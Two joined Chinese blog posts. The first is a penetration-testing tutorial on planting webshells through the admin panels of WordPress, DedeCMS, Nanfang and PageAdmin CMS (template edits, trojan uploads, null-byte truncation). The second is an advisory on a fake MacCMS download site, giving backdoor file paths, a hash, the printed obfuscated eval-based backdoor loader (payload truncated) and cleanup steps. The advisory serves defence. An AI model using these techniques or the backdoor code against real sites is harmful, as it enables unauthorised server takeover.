渗透技巧 | 网站后台常见的Getshell技术整理 get也叫做拿webshell，通过注入或者其他途径，获取网站管理员账号和密码后，找到后台登录地址，登录后，寻找后台漏洞上传网页后门，获取网站的webshell。webshell的作用是方便攻击者，webshell是拥有fso权限，根据fso权限的不用，可以对网页进行编辑，删除，上传或者下载，查看文件。渗透人员也可以通过这个webshell对服务器进行提权，提权成功后，会得到服务器管理权限。一.WordPress的GetshellWordPress是使用PHP语言开发的博客平台，用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统（CMS）来使用。1.更改模板处复现： 第一步：找到外观->编辑->编辑模板。第二步：验证2.上传主题复现：第一步：在上传主题处，上传一个主题压缩包，主题中需要含有木马代码。ps：上传成功后，压缩包会自动解压。上传了一个qiesi的压缩包，成功后木马被自动解压出来第二步：验证二.DedeCMS的Getshell1.任意文件上传dede是织梦内容管理系统dedecms的简称，是一个PHP开源网站管理系统，也是使用用户最多的PHP类CMS系统。复现：第一步：在文件上传处，直接上传木马即可第二步：验证2.模板配置复现：第一步：在模板—>默认模板管理—>修改index.htm模版内容第二步：在生成—>更新主页的HTML中，将htm改成php后更新。第三步：验证3.广告内容复现：第一步：在 模板—>广告管理—>新增广告处第二步：验证三.南方数据CMS南方数据企业网站管理系统V18官方主站、企业网站SQL版、好的企业网站管理系统、企业建站系统、南方数据企业CMS、企业网站SEO、网站优化、SEO搜索引擎优化机制、自助建站系统、前台全站采用静态html页面模板自动生成。是由国内知名的CMS及电子商务管理软件开发商科创网络工作室**自主研发的新一代企业电子商务系统产品、同时提供各种网页模板、企业网站模板、免费企业网站系统、自动建站系统、全能型企业网站系统。1.00截断复现：第一步：在 新闻咨询 -> 添加新闻 -> 上传处第二步：上传，使用00截断第三步：验证2.网站配置复现：第一步：在系统管理->常量设置处，插入代码第二步：验证四.pageadmin CMSPageAdmin CMS系统是基于.Net的网站管理系统,安全、稳定、灵活,全国用户超过百万,致力于为企业、学校、政府网站建设和网站制作提供企业级内容管理系统解决方案。1.自解压 getshell复现：第一步：在文件管理处，选择模板上传，然后上传一个压缩包，其中压缩包里面包含木马。第二步：验证：成功。2.利用配置文件，连接数据库，进行getshell复现：第一步：查看配置文件第二步：连接数据库第三步：验证，可以利用数据库进行命令执行。声明：⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤，任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的，否则后果⾃⾏承担。所有渗透都需获取授权！

苹果CMS/MacCMS V10后门WebShell，第三方下载注意 苹果CMS/MacCMS苹果CMS是国内优秀的开源PHP建站系统，擅长电影程序影视系统这一块，在主流建站系统中特色鲜明，以灵活、小巧、兼容性好、负载强等优点而深受许多站长的喜爱。我一开始没有注意观察假冒官网网址www.maccmsv10.com页面和官网地址www.maccms.com非常像。假官网页面MacCMS后门Webshell查了一下百度 原因是 某天始，MacCMS官网因为某些原因停摆。同时在百度搜索苹果CMS或MacCMS出现的排名第一均为一个：www.maccmsv10.com的网址，而真正的官网地址是www.maccms.com。前者使用了一个和maccms官网一模一样的静态首页提供程序下载。最近几天陆续有人发现了从这个网站下载的苹果CMS程序存在后门webshell。博主直接从该第三方站点下载了源码，至今10月15日依然存在后门，所以基本可确信是故意搭建的假冒官网。后门文件路径​maccms10extendupyunsrcUpyunApiFormat.php​maccms10extendQcloudSmsSms.phpMD5 (maccms10.zip) = 099e02dfa9d283e2891bce5bf9691643</font><?php error_reporting(E_ERROR); @ini_set('display_errors','Off'); @ini_set('max_execution_time',20000); @ini_set('memory_limit','256M'); header("content-Type: text/html; charset=utf-8"); $password = "0d41c75e2ab34a3740834cdd7e066d90"; function s(){ $str = "66756r6374696s6r207374…………"; //大马 $str = str_rot13($str); m($str); } function m($str){ global $password; $jj = ''; eval($jj.pack('H*',$str).$jj); } s(); ?> MacCMS后门Webshell很坦诚的孩子，一目了然 都不伪装一下！！！登录webshell界面有些资历的老哥可能一眼就看出来了，这是一个习科大马改进版。修复：排查你的程序是否存在上面的后门路径文件如果存在，删除后门文件，并进行全盘查杀扫描手动查看可疑文件是存存在隐藏后门检查服务器安全如果是刚搭建的站点建议清除带木马程序的站点去MacCMS官网重新下载大搭建。以下木马文件仅研究学习用。 点击下载